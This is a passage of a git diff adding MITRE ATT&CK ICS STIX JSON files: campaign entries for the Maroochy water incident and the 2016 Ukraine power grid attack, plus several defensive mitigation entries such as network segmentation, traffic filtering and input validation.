"(Citation: Marshall Abrams July 2008)", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "type": "campaign", + "id": "campaign--70cab19e-1745-425e-b3db-c02cd5ff157a", + "created": "2023-03-10T20:01:08.133Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/campaigns/C0020", + "external_id": "C0020" + }, + { + "source_name": "Marshall Abrams July 2008", + "description": "Marshall Abrams 2008, July 23 Malicious Control System Cyber Security Attack Case Study Maroochy Water Services, Australia Retrieved. 2018/03/27 ", + "url": "https://www.mitre.org/sites/default/files/pdf/08_1145.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/campaign/campaign--aa73efef-1418-4dbe-b43c-87a498e97234.json b/cti-ATT-CK-v13.1/ics-attack/campaign/campaign--aa73efef-1418-4dbe-b43c-87a498e97234.json new file mode 100644 index 0000000000000000000000000000000000000000..12cb015b7ef8055e47fbe397132a24d9ef21014f --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/campaign/campaign--aa73efef-1418-4dbe-b43c-87a498e97234.json @@ -0,0 +1,52 @@ +{ + "type": "bundle", + "id": "bundle--c8026253-06b2-44ac-98a3-163ddc80355c", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-10T21:18:24.743Z", + "name": "2016 Ukraine Electric Power Attack", + "description": "[2016 Ukraine Electric Power Attack](https://attack.mitre.org/campaigns/C0025) was a [Sandworm Team](https://attack.mitre.org/groups/G0034) campaign during which they used [Industroyer](https://attack.mitre.org/software/S0604) malware to target and disrupt distribution substations within the Ukrainian power grid. This campaign was the second major public attack conducted against Ukraine by [Sandworm Team](https://attack.mitre.org/groups/G0034).(Citation: ESET Industroyer)(Citation: Dragos Crashoverride 2018)", + "aliases": [ + "2016 Ukraine Electric Power Attack" + ], + "first_seen": "2016-12-01T05:00:00.000Z", + "last_seen": "2016-12-01T05:00:00.000Z", + "x_mitre_first_seen_citation": "(Citation: ESET Industroyer)(Citation: Dragos Crashoverride 2018)", + "x_mitre_last_seen_citation": "(Citation: ESET Industroyer)(Citation: Dragos Crashoverride 2018)", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "type": "campaign", + "id": "campaign--aa73efef-1418-4dbe-b43c-87a498e97234", + "created": "2023-03-31T17:22:23.567Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/campaigns/C0025", + "external_id": "C0025" + }, + { + "source_name": "ESET Industroyer", + "description": "Anton Cherepanov. (2017, June 12). Win32/Industroyer: A new threat for industrial controls systems. Retrieved December 18, 2020.", + "url": "https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf" + }, + { + "source_name": "Dragos Crashoverride 2018", + "description": "Joe Slowik. (2018, October 12). Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE. Retrieved December 18, 2020.", + "url": "https://www.dragos.com/wp-content/uploads/CRASHOVERRIDE2018.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--059ba11e-e3dc-49aa-84ca-88197f40d4ea.json b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--059ba11e-e3dc-49aa-84ca-88197f40d4ea.json new file mode 100644 index 0000000000000000000000000000000000000000..4a8f16c369a3bcdf287e5ad4961d4651503da5ab --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--059ba11e-e3dc-49aa-84ca-88197f40d4ea.json @@ -0,0 +1,37 @@ +{ + "type": "bundle", + "id": "bundle--8178d68a-f9a5-417a-b181-6ececab1515e", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T20:55:21.006Z", + "name": "Application Isolation and Sandboxing", + "description": "Restrict the execution of code to a virtual environment on or in-transit to an endpoint system.", + "labels": [ + "IEC 62443-3-3:2013 - SR 5.4", + "IEC 62443-4-2:2019 - CR 5.4", + "NIST SP 800-53 Rev. 4 - SI-3" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--059ba11e-e3dc-49aa-84ca-88197f40d4ea", + "created": "2019-06-11T17:06:56.230Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0948", + "external_id": "M0948" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--11f242bc-3121-438c-84b2-5cbd46a4bb17.json b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--11f242bc-3121-438c-84b2-5cbd46a4bb17.json new file mode 100644 index 0000000000000000000000000000000000000000..13d7bc925bb0167521079e010a42a9eaf03b57a6 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--11f242bc-3121-438c-84b2-5cbd46a4bb17.json @@ -0,0 +1,42 @@ +{ + "type": "bundle", + "id": "bundle--3007ab4e-b24a-4606-bf51-0407af48b424", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T20:55:19.604Z", + "name": "Filter Network Traffic", + "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic. Perform inline allow/denylisting of network messages based on the application layer (OSI Layer 7) protocol, especially for automation protocols. Application allowlists are beneficial when there are well-defined communication sequences, types, rates, or patterns needed during expected system operations. Application denylists may be needed if all acceptable communication sequences cannot be defined, but instead a set of known malicious uses can be denied (e.g., excessive communication attempts, shutdown messages, invalid commands). Devices performing these functions are often referred to as deep-packet inspection (DPI) firewalls, context-aware firewalls, or firewalls blocking specific automation/SCADA protocol aware firewalls. (Citation: Centre for the Protection of National Infrastructure February 2005)", + "labels": [ + "IEC 62443-3-3:2013 - SR 5.1", + "IEC 62443-4-2:2019 - CR 5.1", + "NIST SP 800-53 Rev. 4 - AC-3; SC-7" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--11f242bc-3121-438c-84b2-5cbd46a4bb17", + "created": "2019-06-11T16:33:55.337Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0937", + "external_id": "M0937" + }, + { + "source_name": "Centre for the Protection of National Infrastructure February 2005", + "description": "Centre for the Protection of National Infrastructure 2005, February FIREWALL DEPLOYMENT FOR SCADA AND PROCESS CONTROL NETWORKS Retrieved. 2020/09/17 ", + "url": "https://www.energy.gov/sites/prod/files/Good%20Practices%20Guide%20for%20Firewall%20Deployment.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--143b4398-3222-480a-b6a4-e131bc2d3144.json b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--143b4398-3222-480a-b6a4-e131bc2d3144.json new file mode 100644 index 0000000000000000000000000000000000000000..dd95661fd34924697a154d42814fa40e8f71610f --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--143b4398-3222-480a-b6a4-e131bc2d3144.json @@ -0,0 +1,37 @@ +{ + "type": "bundle", + "id": "bundle--7f17af24-33aa-4219-95da-df7069ea1bd3", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T20:55:17.426Z", + "name": "Restrict Web-Based Content", + "description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.", + "labels": [ + "IEC 62443-3-3:2013 - SR 2.4", + "IEC 62443-4-2:2019 - HDR 2.4", + "NIST SP 800-53 Rev. 4 - SC-18" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--143b4398-3222-480a-b6a4-e131bc2d3144", + "created": "2019-06-06T20:52:59.206Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0921", + "external_id": "M0921" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--1cbcceef-3233-4062-aa86-ec91afe39517.json b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--1cbcceef-3233-4062-aa86-ec91afe39517.json new file mode 100644 index 0000000000000000000000000000000000000000..8f5378b18f20f5c9704c473dd2eb5f306f66b0a8 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--1cbcceef-3233-4062-aa86-ec91afe39517.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--12cb1484-5fe8-4049-b294-7848cdd11c27", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-31T19:16:54.636Z", + "name": "Validate Program Inputs", + "description": "Devices and programs designed to interact with control system parameters should validate the format and content of all user inputs and actions to ensure the values are within intended operational ranges. These values should be evaluated and further enforced through the program logic running on the field controller. If a problematic or invalid input is identified, the programs should either utilize a predetermined safe value or enter a known safe state, while also logging or alerting on the event.(Citation: PLCTop20 Mar 2023)", + "labels": [ + "NIST SP 800-53 Rev. 4 - SI-10", + "IEC 62443-3-3:2013 - SR 3.5", + "IEC 62443-3-3:2013 - SR 3.6", + "IEC 62443-4-2:2019 - CR 3.5", + "IEC 62443-4-2:2019 - CR 3.6" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "type": "course-of-action", + "id": "course-of-action--1cbcceef-3233-4062-aa86-ec91afe39517", + "created": "2023-03-22T15:49:55.439Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0818", + "external_id": "M0818" + }, + { + "source_name": "PLCTop20 Mar 2023", + "description": "PLC Security, Top 20 Community. (2021, June 15). Secure PLC Coding Practices: Top 20 version 1.0. Retrieved March 22, 2023.", + "url": "https://plc-security.com/content/Top_20_Secure_PLC_Coding_Practices_V1.0.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--1e7ccfc0-94c8-496e-8d27-032120892291.json b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--1e7ccfc0-94c8-496e-8d27-032120892291.json new file mode 100644 index 0000000000000000000000000000000000000000..ab38dfc9847ad6d0c9c00d9380d95c8b2d3ecae9 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--1e7ccfc0-94c8-496e-8d27-032120892291.json @@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--eecccda2-5dcf-4ef2-b90c-f06b677e531c", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T20:55:18.480Z", + "name": "Network Segmentation", + "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Restrict network access to only required systems and services. In addition, prevent systems from other networks or business functions (e.g., enterprise) from accessing critical process control systems. For example, in IEC 62443, systems within the same secure level should be grouped into a zone, and access to that zone is restricted by a conduit, or mechanism to restrict data flows between zones by segmenting the network. (Citation: IEC February 2019) (Citation: IEC August 2013)", + "labels": [ + "IEC 62443-3-3:2013 - SR 5.1", + "IEC 62443-4-2:2019 - CR 5.1", + "NIST SP 800-53 Rev. 4 - AC-3" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--1e7ccfc0-94c8-496e-8d27-032120892291", + "created": "2019-06-10T20:41:03.271Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0930", + "external_id": "M0930" + }, + { + "source_name": "IEC February 2019", + "description": "IEC 2019, February Security for industrial automation and control systems - Part 4-2: Technical security requirements for IACS components Retrieved. 2020/09/25 ", + "url": "https://webstore.iec.ch/publication/34421" + }, + { + "source_name": "IEC August 2013", + "description": "IEC 2013, August Industrial communication networks - Network and system security - Part 3-3: System security requirements and security levels Retrieved. 2020/09/25 ", + "url": "https://webstore.iec.ch/publication/7033" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--2ab9fc6d-3cf6-4d7b-85f1-3ad6949233b3.json b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--2ab9fc6d-3cf6-4d7b-85f1-3ad6949233b3.json new file mode 100644 index 0000000000000000000000000000000000000000..2e3f8f4597fd50f78a34977f2323c3544a20bb2c --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--2ab9fc6d-3cf6-4d7b-85f1-3ad6949233b3.json @@ -0,0 +1,39 @@ +{ + "type": "bundle", + "id": "bundle--8c774de0-ddbb-4fd0-ae0b-537a795797ce", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-11T20:51:32.610Z", + "name": "Restrict Library Loading", + "description": "Prevent abuse of library loading mechanisms in the operating system and software to load untrusted code by configuring appropriate library loading mechanisms and investigating potential vulnerable software.", + "labels": [ + "IEC 62443-3-3:2013 - SR 7.7", + "IEC 62443-4-2:2019 - CR 7.7", + "NIST SP 800-53 Rev. 4 - CM-7" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "type": "course-of-action", + "id": "course-of-action--2ab9fc6d-3cf6-4d7b-85f1-3ad6949233b3", + "created": "2019-06-11T17:00:01.740Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0944", + "external_id": "M0944" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--2f0160b7-e982-49d7-9612-f19b810f1722.json b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--2f0160b7-e982-49d7-9612-f19b810f1722.json new file mode 100644 index 0000000000000000000000000000000000000000..4bf191f892dc4aaf08f9ac151e89c6aeec4537c5 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--2f0160b7-e982-49d7-9612-f19b810f1722.json @@ -0,0 +1,32 @@ +{ + "type": "bundle", + "id": "bundle--9d378897-1661-4ec7-8c8e-9daab267b879", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Active Directory Configuration", + "description": "Configure Active Directory to prevent use of certain techniques; use security identifier (SID) Filtering, etc.", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--2f0160b7-e982-49d7-9612-f19b810f1722", + "created": "2019-06-06T16:39:58.291Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0915", + "external_id": "M0915" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--3172222b-4983-43f7-8983-753ded4f13bc.json b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--3172222b-4983-43f7-8983-753ded4f13bc.json new file mode 100644 index 0000000000000000000000000000000000000000..83ebd1fbc6d0fd319e754a887368452d9be699a2 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--3172222b-4983-43f7-8983-753ded4f13bc.json @@ -0,0 +1,37 @@ +{ + "type": "bundle", + "id": "bundle--ca7991c9-520c-4a00-a9ee-1802130364f5", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T20:55:18.665Z", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries. In industrial control environments, network intrusion prevention should be configured so it will not disrupt protocols and communications responsible for real-time functions related to control or safety.", + "labels": [ + "IEC 62443-3-3:2013 - SR 6.2", + "IEC 62443-4-2:2019 - CR 6.2", + "NIST SP 800-53 Rev. 4 - SI-4" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--3172222b-4983-43f7-8983-753ded4f13bc", + "created": "2019-06-10T20:46:02.263Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0931", + "external_id": "M0931" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--3222a807-521b-4a1a-aa13-f1cda45734b3.json b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--3222a807-521b-4a1a-aa13-f1cda45734b3.json new file mode 100644 index 0000000000000000000000000000000000000000..5e973e574381eac99a070d0e0cde601779cc19e6 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--3222a807-521b-4a1a-aa13-f1cda45734b3.json @@ -0,0 +1,37 @@ +{ + "type": "bundle", + "id": "bundle--c4734fa7-3498-4f51-b03a-77b627ce541d", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T20:55:17.759Z", + "name": "Restrict Registry Permissions", + "description": "Restrict the ability to modify certain hives or keys in the Windows Registry.", + "labels": [ + "IEC 62443-3-3:2013 - SR 2.1", + "IEC 62443-4-2:2019 - CR 2.1", + "NIST SP 800-53 Rev. 4 - AC-6" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--3222a807-521b-4a1a-aa13-f1cda45734b3", + "created": "2019-06-06T20:58:59.577Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0924", + "external_id": "M0924" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--337c4e2a-21a7-4d9a-bfee-9efd6cebf0e5.json b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--337c4e2a-21a7-4d9a-bfee-9efd6cebf0e5.json new file mode 100644 index 0000000000000000000000000000000000000000..ee8e5efbd9bf0231365c7b554dc2ab1273549d2c --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--337c4e2a-21a7-4d9a-bfee-9efd6cebf0e5.json @@ -0,0 +1,36 @@ +{ + "type": "bundle", + "id": "bundle--0cd9a815-58b5-4fd3-8638-63722e21ee6a", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T20:55:14.442Z", + "name": "Data Loss Prevention", + "description": "Data Loss Prevention (DLP) technologies can be used to help identify adversarial attempts to exfiltrate operational information, such as engineering plans, trade secrets, recipes, intellectual property, or process telemetry. DLP functionality may be built into other security products such as firewalls or standalone suites running on the network and host-based agents. DLP may be configured to prevent the transfer of information through corporate resources such as email, web, and physical media such as USB for host-based solutions.", + "labels": [ + "IEC 62443-3-3:2013 - SR 4.1", + "IEC 62443-4-2:2019 - CR 4.1" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--337c4e2a-21a7-4d9a-bfee-9efd6cebf0e5", + "created": "2020-09-11T16:32:21.854Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0803", + "external_id": "M0803" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--3992ce42-43e9-4bea-b8db-a102ec3ec1e3.json b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--3992ce42-43e9-4bea-b8db-a102ec3ec1e3.json new file mode 100644 index 0000000000000000000000000000000000000000..af0b960cbb899b22074ef24ec42bf3722ecd4e51 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--3992ce42-43e9-4bea-b8db-a102ec3ec1e3.json @@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--b1783e8d-5969-4cb0-b721-bbae9236d5a4", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T20:55:14.081Z", + "name": "Access Management", + "description": "Access Management technologies can be used to enforce authorization polices and decisions, especially when existing field devices do not provided sufficient capabilities to support user identification and authentication. (Citation: McCarthy, J et al. July 2018) These technologies typically utilize an in-line network device or gateway system to prevent access to unauthenticated users, while also integrating with an authentication service to first verify user credentials. (Citation: Centre for the Protection of National Infrastructure November 2010)", + "labels": [ + "IEC 62443-3-3:2013 - SR 2.1", + "IEC 62443-4-2:2019 - CR 2.1", + "NIST SP 800-53 Rev. 4 - AC-3" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--3992ce42-43e9-4bea-b8db-a102ec3ec1e3", + "created": "2020-09-11T16:32:21.854Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0801", + "external_id": "M0801" + }, + { + "source_name": "McCarthy, J et al. July 2018", + "description": "McCarthy, J et al. 2018, July NIST SP 1800-2 Identity and Access Management for Electric Utilities Retrieved. 2020/09/17 ", + "url": "https://doi.org/10.6028/NIST.SP.1800-2" + }, + { + "source_name": "Centre for the Protection of National Infrastructure November 2010", + "description": "Centre for the Protection of National Infrastructure 2010, November Configuring and Managing Remote Access for Industrial Control Systems Retrieved. 2020/09/25 ", + "url": "https://us-cert.cisa.gov/sites/default/files/recommended_practices/RP_Managing_Remote_Access_S508NC.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--469b78dd-a54d-4f7c-8c3b-4a1dd916b433.json b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--469b78dd-a54d-4f7c-8c3b-4a1dd916b433.json new file mode 100644 index 0000000000000000000000000000000000000000..e3188a870fe2eb482584b8c38c0b7d8c761a67de --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--469b78dd-a54d-4f7c-8c3b-4a1dd916b433.json @@ -0,0 +1,32 @@ +{ + "type": "bundle", + "id": "bundle--65d01bdf-a4c6-4920-9bc0-71997300128e", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Mitigation Limited or Not Effective", + "description": "This type of attack technique cannot be easily mitigated with preventative controls since it is based on the abuse of system features.", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--469b78dd-a54d-4f7c-8c3b-4a1dd916b433", + "created": "2020-09-11T16:32:21.854Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0816", + "external_id": "M0816" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--49363b74-d506-4342-bd63-320586ebadb9.json b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--49363b74-d506-4342-bd63-320586ebadb9.json new file mode 100644 index 0000000000000000000000000000000000000000..68c577b213eb11c441fa0f4c827560db77b66897 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--49363b74-d506-4342-bd63-320586ebadb9.json @@ -0,0 +1,37 @@ +{ + "type": "bundle", + "id": "bundle--91c8b241-8b61-4275-8427-0e1ebf3a0867", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T20:55:21.352Z", + "name": "Exploit Protection", + "description": "Use capabilities to detect and block conditions that may lead to or be indicative of a software exploit occurring.", + "labels": [ + "IEC 62443-3-3:2013 - SR 3.2", + "IEC 62443-4-2:2019 - CR 3.2", + "NIST SP 800-53 Rev. 4 - SI-16" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--49363b74-d506-4342-bd63-320586ebadb9", + "created": "2019-06-11T17:10:57.070Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0950", + "external_id": "M0950" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--49b306c1-a046-42c5-a4d2-30f264ada110.json b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--49b306c1-a046-42c5-a4d2-30f264ada110.json new file mode 100644 index 0000000000000000000000000000000000000000..82e2931505cc83b68be0bec9afd5425adb6077af --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--49b306c1-a046-42c5-a4d2-30f264ada110.json @@ -0,0 +1,37 @@ +{ + "type": "bundle", + "id": "bundle--74768b6e-3678-471a-89ed-61c619b9ca86", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T20:55:19.179Z", + "name": "Limit Access to Resource 